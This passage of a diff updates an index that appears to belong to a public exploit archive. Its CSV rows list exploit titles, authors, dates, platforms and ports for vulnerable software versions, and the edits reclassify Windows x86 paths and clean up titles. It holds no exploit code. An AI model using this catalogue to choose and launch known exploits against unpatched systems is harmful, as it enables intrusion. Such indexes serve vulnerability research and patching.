+132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure",2003-12-06,m00,linux,remote,80
 133,platforms/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow / Denial of Service",2003-12-15,"Peter Winter-Smith",windows,remote,80
 135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service - Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135
 136,platforms/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal Exploit",2003-12-18,kralor,windows,remote,80
@ -8979,7 +8981,7 @@ id,file,description,date,author,platform,type,port
 581,platforms/linux/remote/581.c,"ProFTPd 1.2.10 - Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0
 582,platforms/windows/remote/582.c,"YahooPOPs 1.6 - SMTP Remote Buffer Overflow",2004-10-18,"Diabolic Crab",windows,remote,25
 583,platforms/windows/remote/583.pl,"SLX Server 6.1 - Arbitrary File Creation (PoC)",2004-10-18,"Carl Livitt",windows,remote,0
-584,platforms/windows/remote/584.c,"Microsoft Windows (x86) - Metafile '.emf' Heap Overflow (MS04-032)",2004-10-20,houseofdabus,windows,remote,0
+584,platforms/win_x86/remote/584.c,"Microsoft Windows (x86) - Metafile '.emf' Heap Overflow (MS04-032)",2004-10-20,houseofdabus,win_x86,remote,0
 588,platforms/windows/remote/588.py,"Ability Server 2.34 - FTP STOR Buffer Overflow",2004-10-21,muts,windows,remote,21
 589,platforms/windows/remote/589.html,"Multiple (Almost all) Browsers - Tabbed Browsing Vulnerabilities",2004-10-22,"Jakob Balle",windows,remote,0
 590,platforms/windows/remote/590.c,"ShixxNOTE 6.net - Remote Buffer Overflow",2004-10-22,class101,windows,remote,2000
@ -9030,7 +9032,7 @@ id,file,description,date,author,platform,type,port
 758,platforms/osx/remote/758.c,"Apple iTunes - Playlist Local Parsing Buffer Overflow",2005-01-16,nemo,osx,remote,0
 759,platforms/windows/remote/759.cpp,"Apple iTunes - Playlist Buffer Overflow Download Shellcode Exploit",2005-01-16,ATmaCA,windows,remote,0
 761,platforms/windows/remote/761.cpp,"NodeManager Professional 2.00 - Buffer Overflow",2005-01-18,"Tan Chew Keong",windows,remote,162
-764,platforms/unix/remote/764.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)",2003-04-04,spabam,unix,remote,80
+764,platforms/unix/remote/764.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit",2003-04-04,spabam,unix,remote,80
 765,platforms/windows/remote/765.c,"Microsoft Internet Explorer - '.ANI' Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0
 767,platforms/windows/remote/767.pl,"Golden FTP Server 2.02b - Remote Buffer Overflow",2005-01-22,Barabas,windows,remote,21
 771,platforms/windows/remote/771.cpp,"Microsoft Internet Explorer - '.ANI' Downloader Exploit (MS05-002)",2005-01-24,Vertygo,windows,remote,0
@ -9156,7 +9158,7 @@ id,file,description,date,author,platform,type,port
 1261,platforms/hp-ux/remote/1261.pm,"HP-UX 11.11 - lpd Remote Command Execution (Metasploit)",2005-10-19,"H D Moore",hp-ux,remote,515
 1262,platforms/windows/remote/1262.pm,"CA Unicenter 3.1 - CAM log_security() Stack Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,4105
 1263,platforms/multiple/remote/1263.pl,"Veritas NetBackup 6.0 (Linux) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",multiple,remote,13722
-1264,platforms/windows/remote/1264.pl,"Veritas NetBackup 6.0 (Windows x86) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",windows,remote,13722
+1264,platforms/win_x86/remote/1264.pl,"Veritas NetBackup 6.0 (Windows x86) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",win_x86,remote,13722
 1265,platforms/osx/remote/1265.pl,"Veritas NetBackup 6.0 (OSX) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",osx,remote,13722
 1272,platforms/linux/remote/1272.c,"Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow",2005-10-25,rd,linux,remote,0
 1277,platforms/windows/remote/1277.c,"Mirabilis ICQ 2003a - Buffer Overflow Download Shellcode Exploit",2005-10-29,ATmaCA,windows,remote,0
@ -9429,7 +9431,7 @@ id,file,description,date,author,platform,type,port
 3661,platforms/windows/remote/3661.pl,"HP Mercury Quality Center - Spider90.ocx ProgColor Overflow",2007-04-04,ri0t,windows,remote,0
 3662,platforms/windows/remote/3662.rb,"AOL SuperBuddy - ActiveX Control Remote Code Execution (Metasploit)",2007-04-04,"Krad Chad",windows,remote,0
 3675,platforms/windows/remote/3675.rb,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (2)",2007-04-06,"Umesh Wanve",windows,remote,21
-3680,platforms/windows/remote/3680.sh,"Apache (mod_rewrite) (Windows x86) - Off-by-One Remote Overflow",2007-04-07,axis,windows,remote,80
+3680,platforms/win_x86/remote/3680.sh,"Apache mod_rewrite (Windows x86) - Off-by-One Remote Overflow",2007-04-07,axis,win_x86,remote,80
 3698,platforms/linux/remote/3698.txt,"Kerberos 1.5.1 - Kadmind Buffer Overflow",2007-04-10,c0ntex,linux,remote,0
 3708,platforms/multiple/remote/3708.htm,"MiniWebsvr 0.0.7 - Remote Directory Traversal",2007-04-11,shinnai,multiple,remote,0
 3724,platforms/linux/remote/3724.c,"Aircrack-NG 0.7 - 'Specially Crafted 802.11 Packets' Remote Buffer Overflow",2007-04-12,"Jonathan So",linux,remote,0
@ -9444,7 +9446,7 @@ id,file,description,date,author,platform,type,port
 3810,platforms/windows/remote/3810.html,"IPIX Image Well ActiveX - 'iPIX-ImageWell-ipix.dll' Buffer Overflow",2007-04-27,"Umesh Wanve",windows,remote,0
 3815,platforms/linux/remote/3815.c,"Fenice Oms server 1.10 - Remote Buffer Overflow (exec-shield)",2007-04-29,Xpl017Elz,linux,remote,0
 3821,platforms/linux/remote/3821.c,"3proxy 0.5.3g (Linux) - proxy.c logurl() Remote Buffer Overflow",2007-04-30,vade79,linux,remote,0
-3822,platforms/windows/remote/3822.c,"3proxy 0.5.3g (Windows x86) - proxy.c logurl() Remote Buffer Overflow",2007-04-30,vade79,windows,remote,0
+3822,platforms/win_x86/remote/3822.c,"3proxy 0.5.3g (Windows x86) - proxy.c logurl() Remote Buffer Overflow",2007-04-30,vade79,win_x86,remote,0
 3829,platforms/linux/remote/3829.c,"3proxy 0.5.3g - proxy.c logurl() Remote Overflow (exec-shield)",2007-05-02,Xpl017Elz,linux,remote,0
 3844,platforms/windows/remote/3844.html,"ActSoft DVD-Tools - 'dvdtools.ocx 3.8.5.0' Stack Overflow",2007-05-04,shinnai,windows,remote,0
 3872,platforms/windows/remote/3872.html,"Taltech Tal Bar Code - ActiveX Control Buffer Overflow",2007-05-08,"Umesh Wanve",windows,remote,0
@ -9473,7 +9475,7 @@ id,file,description,date,author,platform,type,port
 3982,platforms/windows/remote/3982.html,"Dart Communications PowerTCP - Service Control Remote Buffer Overflow",2007-05-24,rgod,windows,remote,0
 3984,platforms/windows/remote/3984.html,"Dart Communications PowerTCP - ZIP Compression Remote Buffer Overflow",2007-05-25,rgod,windows,remote,0
 3993,platforms/windows/remote/3993.html,"Microsoft Internet Explorer 6 / Ademco co. ltd. ATNBaseLoader100 Module - Remote Buffer Overflow",2007-05-26,rgod,windows,remote,0
-3996,platforms/windows/remote/3996.c,"Apache (mod_rewrite) 2.0.58 (Windows 2003) - Remote Overflow",2007-05-26,fabio/b0x,windows,remote,80
+3996,platforms/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite (Windows 2003) - Remote Overflow",2007-05-26,fabio/b0x,windows,remote,80
 4008,platforms/windows/remote/4008.html,"Zenturi ProgramChecker - ActiveX File Download/Overwrite",2007-05-30,shinnai,windows,remote,0
 4010,platforms/windows/remote/4010.html,"EDraw Office Viewer Component - Unsafe Method Exploit",2007-05-30,shinnai,windows,remote,0
 4014,platforms/windows/remote/4014.py,"Eudora 7.1.0.9 - (IMAP FLAGS) Remote Overwrite (SEH)",2007-05-30,h07,windows,remote,0
@ -9509,7 +9511,7 @@ id,file,description,date,author,platform,type,port
 4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 - WebTools Remote Overwrite (SEH)",2007-07-07,Heretic2,windows,remote,9999
 4158,platforms/windows/remote/4158.html,"NeoTracePro 3.25 - ActiveX TraceTarget() Remote Buffer Overflow",2007-07-07,nitr0us,windows,remote,0
 4160,platforms/windows/remote/4160.html,"Chilkat Zip ActiveX Component 12.4 - Multiple Insecure Methods",2007-07-07,shinnai,windows,remote,0
-4162,platforms/linux/remote/4162.c,"Apache Tomcat Connector (mod_jk) - Remote Exploit (exec-shield)",2007-07-08,Xpl017Elz,linux,remote,80
+4162,platforms/linux/remote/4162.c,"Apache Tomcat Connector mod_jk - 'exec-shield' Remote Exploit",2007-07-08,Xpl017Elz,linux,remote,80
 4170,platforms/windows/remote/4170.html,"Program Checker - 'sasatl.dll 1.5.0.531' JavaScript Heap Spraying Exploit",2007-07-10,callAX,windows,remote,0
 4176,platforms/windows/remote/4176.html,"SecureBlackbox 'PGPBBox.dll 5.1.0.112' - Arbitrary Data Write Exploit",2007-07-12,callAX,windows,remote,0
 4177,platforms/windows/remote/4177.html,"Program Checker - 'sasatl.dll 1.5.0.531' DebugMsgLog Heap Spraying Exploit",2007-07-12,callAX,windows,remote,0
@ -9620,7 +9622,7 @@ id,file,description,date,author,platform,type,port
 4745,platforms/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065)",2007-12-18,axis,windows,remote,0
 4746,platforms/windows/remote/4746.html,"RavWare Software - '.MAS' Flic Control Remote Buffer Overflow",2007-12-18,shinnai,windows,remote,0
 4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - (ulang) Remote Command Execution",2007-12-18,rgod,windows,remote,0
-4754,platforms/windows/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - logurl() Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",windows,remote,3128
+4754,platforms/win_x86/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - logurl() Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",win_x86,remote,3128
 4760,platforms/windows/remote/4760.txt,"Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0
 4761,platforms/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Command Execution",2007-12-21,eliteboy,multiple,remote,25
 4784,platforms/windows/remote/4784.pl,"BadBlue 2.72 - PassThru Remote Buffer Overflow",2007-12-24,"Jacopo Cervini",windows,remote,80
@ -9671,7 +9673,7 @@ id,file,description,date,author,platform,type,port
 5052,platforms/windows/remote/5052.html,"Yahoo! JukeBox MediaGrid - 'AddBitmap()' ActiveX Buffer Overflow",2008-02-03,Elazar,windows,remote,0
 5069,platforms/windows/remote/5069.pl,"dBpowerAMP Audio Player Release 2 - '.m3u' Buffer Overflow",2008-02-06,securfrog,windows,remote,0
 5078,platforms/windows/remote/5078.htm,"Backup Exec System Recovery Manager 7.0.1 - Arbitrary File Upload",2008-02-07,titon,windows,remote,0
-5079,platforms/windows/remote/5079.c,"SapLPD 6.28 (Windows x86) - Remote Buffer Overflow",2008-02-07,BackBone,windows,remote,515
+5079,platforms/win_x86/remote/5079.c,"SapLPD 6.28 (Windows x86) - Remote Buffer Overflow",2008-02-07,BackBone,win_x86,remote,515
 5087,platforms/windows/remote/5087.html,"Microsoft DirectSpeechSynthesis Module - Remote Buffer Overflow",2008-02-09,rgod,windows,remote,0
 5100,platforms/windows/remote/5100.html,"ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow",2008-02-10,Elazar,windows,remote,0
 5102,platforms/windows/remote/5102.html,"FaceBook PhotoUploader 5.0.14.0 - Remote Buffer Overflow",2008-02-12,"MC Group Ltd.",windows,remote,0
@ -9703,12 +9705,12 @@ id,file,description,date,author,platform,type,port
 5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G Firmware 1.00.9 - Security Bypass Vulnerabilities (1)",2008-03-26,meathive,hardware,remote,0
 5314,platforms/windows/remote/5314.py,"TFTP Server 1.4 - ST Buffer Overflow",2008-03-26,muts,windows,remote,69
 5315,platforms/windows/remote/5315.py,"Quick TFTP Server Pro 2.1 - Remote SEH Overflow",2008-03-26,muts,windows,remote,69
-5330,platforms/windows/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow",2008-03-31,Heretic2,windows,remote,80
+5330,platforms/win_x86/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow",2008-03-31,Heretic2,win_x86,remote,80
 5332,platforms/windows/remote/5332.html,"Real Player - 'rmoc3260.dll' ActiveX Control Remote Code Execution",2008-04-01,Elazar,windows,remote,0
 5338,platforms/windows/remote/5338.html,"ChilkatHttp ActiveX 2.3 - Arbitrary Files Overwrite",2008-04-01,shinnai,windows,remote,0
 5342,platforms/windows/remote/5342.py,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - OVAS.exe SEH Unauthenticated Overflow",2008-04-02,muts,windows,remote,7510
 5366,platforms/solaris/remote/5366.rb,"Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit)",2008-04-04,I)ruid,solaris,remote,0
-5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 (mod_jk2) - Remote Overflow",2008-04-06,"INetCop Security",linux,remote,80
+5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 mod_jk2 - Remote Overflow",2008-04-06,"INetCop Security",linux,remote,80
 5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0
 5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download - 'NeffyLauncher.dll' Code Execution",2008-04-07,"Simon Ryeo",windows,remote,0
 5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport 4.6.1 FileTransfer - ActiveX Buffer Overflow",2008-04-07,"Patrick Webster",windows,remote,0
@ -9754,7 +9756,7 @@ id,file,description,date,author,platform,type,port
 6045,platforms/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Parameter Remote Code Execution (Python)",2008-07-12,muts,linux,remote,80
 6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,windows,remote,80
 6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0
-6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,windows,remote,80
+6100,platforms/win_x86/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,win_x86,remote,80
 6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow",2008-07-22,"Guido Landi",windows,remote,0
 6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 - (server header) Remote Code Execution",2008-07-22,Koshi,windows,remote,0
 6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (C)",2008-07-23,r0ut3r,windows,remote,0
@ -10127,7 +10129,7 @@ id,file,description,date,author,platform,type,port
 9966,platforms/windows/remote/9966.txt,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (1)",2009-11-02,"Nikolas Rangos",windows,remote,80
 33433,platforms/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
 9992,platforms/windows/remote/9992.txt,"AOL 9.1 SuperBuddy - ActiveX Control Remote code Execution",2009-10-01,Trotzkista,windows,remote,0
-9993,platforms/multiple/remote/9993.txt,"Apache (mod_perl) - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0
+9993,platforms/multiple/remote/9993.txt,"Apache mod_perl - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0
 9994,platforms/multiple/remote/9994.txt,"Apache Tomcat - Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",multiple,remote,0
 9995,platforms/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication 'Username' Enumeration",2009-11-09,"D. Matscheko",multiple,remote,0
 9997,platforms/multiple/remote/9997.txt,"Blender 2.49b - '.blend' Remote Command Execution",2009-11-09,"Fernando Russ",multiple,remote,0
@ -10222,7 +10224,7 @@ id,file,description,date,author,platform,type,port
 11539,platforms/windows/remote/11539.py,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow",2010-02-22,athleet,windows,remote,0
 11615,platforms/win_x86/remote/11615.txt,"Microsoft Internet Explorer 6 / 7 / 8 - 'winhlp32.exe' 'MsgBox()' Remote Code Execution",2010-03-02,"Maurycy Prodeus",win_x86,remote,0
 11618,platforms/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Buffer Overflow",2010-03-02,"S2 Crew",windows,remote,0
-11650,platforms/windows/remote/11650.c,"Apache 2.2.14 (mod_isapi) - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
+11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
 11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0
 11662,platforms/multiple/remote/11662.txt,"Apache SpamAssassin Milter Plugin 0.3.1 - Remote Command Execution",2010-03-09,kingcope,multiple,remote,0
 11668,platforms/windows/remote/11668.rb,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)",2010-03-09,blake,windows,remote,0
@ -11169,7 +11171,7 @@ id,file,description,date,author,platform,type,port
 17904,platforms/windows/remote/17904.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (Metasploit)",2011-09-29,otoy,windows,remote,0
 17936,platforms/windows/remote/17936.rb,"Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit)",2011-10-06,"Jose A. Vazquez",windows,remote,0
 17948,platforms/windows/remote/17948.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (Metasploit) (2)",2011-10-09,Metasploit,windows,remote,0
-17969,platforms/multiple/remote/17969.py,"Apache (mod_proxy) - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0
+17969,platforms/multiple/remote/17969.py,"Apache mod_proxy - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0
 17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - (SVG layout) Memory Corruption (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote,0
 17974,platforms/windows/remote/17974.html,"Mozilla Firefox - Array.reduceRight() Integer Overflow (1)",2011-10-12,ryujin,windows,remote,0
 17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote,0
@ -12317,7 +12319,7 @@ id,file,description,date,author,platform,type,port
 21662,platforms/windows/remote/21662.txt,"Microsoft Outlook Express 6 - XML File Attachment Script Execution",2002-07-29,http-equiv,windows,remote,0
 21663,platforms/linux/remote/21663.c,"Fake Identd 0.9/1.x - Client Query Remote Buffer Overflow",2002-07-25,Jedi/Sector,linux,remote,0
 21670,platforms/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 - Filename Buffer Overflow",2002-07-30,ken@FTU,windows,remote,0
-21671,platforms/unix/remote/21671.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit (1)",2002-07-30,spabam,unix,remote,80
+21671,platforms/unix/remote/21671.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit",2002-07-30,spabam,unix,remote,80
 40347,platforms/unix/remote/40347.txt,"Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit",2002-09-17,"Solar Eclipse",unix,remote,80
 21675,platforms/windows/remote/21675.pl,"Trillian 0.x IRC Module - Buffer Overflow",2002-07-31,"John C. Hennessy",windows,remote,0
 21677,platforms/solaris/remote/21677.txt,"Sun AnswerBook2 1.x - Unauthorized Administrative Script Access",2002-08-02,ghandi,solaris,remote,0
@ -13913,7 +13915,7 @@ id,file,description,date,author,platform,type,port
 31047,platforms/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 - 'txt' Parameter Cross-Site Scripting",2008-01-22,"Jan Fry",multiple,remote,0
 31050,platforms/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",multiple,remote,0
 31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 - 'chrome://' URI JavaScript File Request Information Disclosure",2008-01-19,"Gerry Eisenhaur",linux,remote,0
-31052,platforms/linux/remote/31052.java,"Apache 2.2.6 (mod_negotiation) - HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0
+31052,platforms/linux/remote/31052.java,"Apache 2.2.6 mod_negotiation - HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0
 31053,platforms/php/remote/31053.php,"PHP 5.2.5 - cURL 'safe mode' Security Bypass",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
 31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
 40358,platforms/linux/remote/40358.py,"LamaHub 0.0.6.2 - Buffer Overflow",2016-09-09,Pi3rrot,linux,remote,4111
@ -14731,7 +14733,7 @@ id,file,description,date,author,platform,type,port
 36318,platforms/windows/remote/36318.txt,"Jetty Web Server - Directory Traversal",2011-11-18,"Alexey Sintsov",windows,remote,0
 36319,platforms/windows/remote/36319.txt,"GoAhead WebServer 2.5 - 'goform/formTest' Multiple Cross-Site Scripting Vulnerabilities",2011-11-18,"Prabhu S Angadi",windows,remote,0
 36337,platforms/linux/remote/36337.py,"ElasticSearch - Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200
-36352,platforms/linux/remote/36352.txt,"Apache 7.0.x (mod_proxy) - Reverse Proxy Security Bypass",2011-11-24,"Prutha Parikh",linux,remote,0
+36352,platforms/linux/remote/36352.txt,"Apache 7.0.x mod_proxy - Reverse Proxy Security Bypass",2011-11-24,"Prutha Parikh",linux,remote,0
 36360,platforms/windows/remote/36360.rb,"Adobe Flash Player - ByteArray UncompressViaZlibVariant Use-After-Free (Metasploit)",2015-03-12,Metasploit,windows,remote,0
 36370,platforms/linux/remote/36370.txt,"ArcSight Logger - Arbitrary File Upload / Code Execution",2015-03-13,"Horoszkiewicz Julian ISP_",linux,remote,0
 36376,platforms/windows/remote/36376.txt,"Oxide WebServer - Directory Traversal",2011-11-29,demonalex,windows,remote,0
@ -14774,7 +14776,7 @@ id,file,description,date,author,platform,type,port
 36607,platforms/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 - Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
 36652,platforms/multiple/remote/36652.py,"w3tw0rk / Pitbull Perl IRC Bot - Remote Code Execution (PoC)",2015-04-06,"Jay Turla",multiple,remote,6667
 36653,platforms/jsp/remote/36653.rb,"JBoss Seam 2 - Arbitrary File Upload / Execution (Metasploit)",2015-04-06,Metasploit,jsp,remote,8080
-36663,platforms/linux/remote/36663.txt,"Apache 2.2.15 (mod_proxy) - Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",linux,remote,0
+36663,platforms/linux/remote/36663.txt,"Apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",linux,remote,0
 36670,platforms/hardware/remote/36670.txt,"D-Link ShareCenter Products - Multiple Remote Code Execution Vulnerabilities",2012-02-08,"Roberto Paleari",hardware,remote,0
 36679,platforms/windows/remote/36679.rb,"SolarWinds Firewall Security Manager 6.6.5 - Client Session Handling (Metasploit)",2015-04-08,Metasploit,windows,remote,0
 36680,platforms/hardware/remote/36680.txt,"Multiple Trendnet Camera Products - Remote Security Bypass",2012-02-10,console-cowboys,hardware,remote,0
@ -15063,7 +15065,7 @@ id,file,description,date,author,platform,type,port
 39186,platforms/multiple/remote/39186.pl,"UPS Web/SNMP-Manager CS121 - Authentication Bypass",2014-05-15,jkmac,multiple,remote,0
 39194,platforms/hardware/remote/39194.txt,"AVM FRITZ!Box < 6.30 - Buffer Overflow",2016-01-07,"RedTeam Pentesting",hardware,remote,0
 39195,platforms/hardware/remote/39195.c,"Foscam IP Camera - Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",hardware,remote,0
-39196,platforms/linux/remote/39196.py,"Apache (mod_wsgi) - Information Disclosure",2014-05-21,"Buck Golemon",linux,remote,0
+39196,platforms/linux/remote/39196.py,"Apache mod_wsgi - Information Disclosure",2014-05-21,"Buck Golemon",linux,remote,0
 39205,platforms/multiple/remote/39205.txt,"Castor Library - XML External Entity Information Disclosure",2014-05-27,"Ron Gutierrez",multiple,remote,0
 39209,platforms/hardware/remote/39209.txt,"Huawei E303 Router - Cross-Site Request Forgery",2014-05-30,"Benjamin Daniel Mussler",hardware,remote,0
 39215,platforms/windows/remote/39215.py,"Konica Minolta FTP Utility 1.00 - CWD Command SEH Overflow",2016-01-11,TOMIWA,windows,remote,21
@ -16057,7 +16059,7 @@ id,file,description,date,author,platform,type,port
 1361,platforms/php/webapps/1361.c,"SimpleBBS 1.1 - Remote Commands Execution Exploit (C)",2005-12-07,unitedasia,php,webapps,0
 1363,platforms/php/webapps/1363.php,"Website Baker 2.6.0 - Login Bypass / Remote Code Execution",2005-12-08,rgod,php,webapps,0
 1364,platforms/php/webapps/1364.c,"SugarSuite Open Source 4.0beta - Remote Code Execution (2)",2005-12-08,pointslash,php,webapps,0
-1367,platforms/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution Exploit",2005-12-10,rgod,php,webapps,0
+1367,platforms/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution",2005-12-10,rgod,php,webapps,0
 1370,platforms/php/webapps/1370.php,"phpCOIN 1.2.2 - 'phpcoinsessid' SQL Injection / Remote Code Execution",2005-12-12,rgod,php,webapps,0
 1373,platforms/php/webapps/1373.php,"Limbo 1.0.4.2 - _SERVER[REMOTE_ADDR] Overwrite Remote Exploit",2005-12-14,rgod,php,webapps,0
 1379,platforms/php/webapps/1379.php,"PHPGedView 3.3.7 - Arbitrary Remote Code Execution",2005-12-20,rgod,php,webapps,0
@ -17056,7 +17058,7 @@ id,file,description,date,author,platform,type,port
 2862,platforms/php/webapps/2862.txt,"P-News 2.0 - 'user.txt' Remote Password Disclosure",2006-11-28,Lu7k,php,webapps,0
 2863,platforms/php/webapps/2863.php,"kubix 0.7 - Multiple Vulnerabilities",2006-11-29,BlackHawk,php,webapps,0
 2864,platforms/php/webapps/2864.txt,"b2evolution 1.8.5 < 1.9b - 'import-mt.php' Remote File Inclusion",2006-11-29,tarkus,php,webapps,0
-2867,platforms/php/webapps/2867.php,"phpGraphy 0.9.12 - Privilege Escalation / Commands Execution Exploit",2006-11-30,rgod,php,webapps,0
+2867,platforms/php/webapps/2867.php,"phpGraphy 0.9.12 - Privilege Escalation / Commands Execution",2006-11-30,rgod,php,webapps,0
 2869,platforms/php/webapps/2869.php,"S9Y Serendipity 1.0.3 - 'comment.php' Local File Inclusion",2006-11-30,Kacper,php,webapps,0
 2871,platforms/php/webapps/2871.txt,"LDU 8.x - 'polls.php' SQL Injection",2006-11-30,ajann,php,webapps,0
 2876,platforms/php/webapps/2876.txt,"DZCP (deV!L_z Clanportal) 1.3.6 - Arbitrary File Upload",2006-12-01,"Tim Weber",php,webapps,0
@ -22479,7 +22481,7 @@ id,file,description,date,author,platform,type,port
 11437,platforms/php/webapps/11437.txt,"ZeusCMS 0.2 - Database Backup Dump / Local File Inclusion",2010-02-13,ViRuSMaN,php,webapps,0
 11440,platforms/php/webapps/11440.txt,"InterTech Co 1.0 - SQL Injection",2010-02-13,Red-D3v1L,php,webapps,0
 11441,platforms/php/webapps/11441.txt,"WordPress 2.9 - Failure to Restrict URL Access",2010-02-13,tmacuk,php,webapps,0
-11442,platforms/php/webapps/11442.txt,"PEAR 1.9.0 - Multiple Remote File Inclusion",2010-02-14,eidelweiss,php,webapps,0
+11442,platforms/php/webapps/11442.txt,"PHP PEAR 1.9.0 - Multiple Remote File Inclusion",2010-02-14,eidelweiss,php,webapps,0
 11443,platforms/php/webapps/11443.txt,"Calendarix 0.8.20071118 - SQL Injection",2010-02-14,Thibow,php,webapps,0
 11444,platforms/php/webapps/11444.txt,"ShortCMS 1.2.0 - SQL Injection",2010-02-14,Thibow,php,webapps,0
 11445,platforms/php/webapps/11445.txt,"JTL-Shop 2 - 'druckansicht.php' SQL Injection",2010-02-14,Lo$T,php,webapps,0
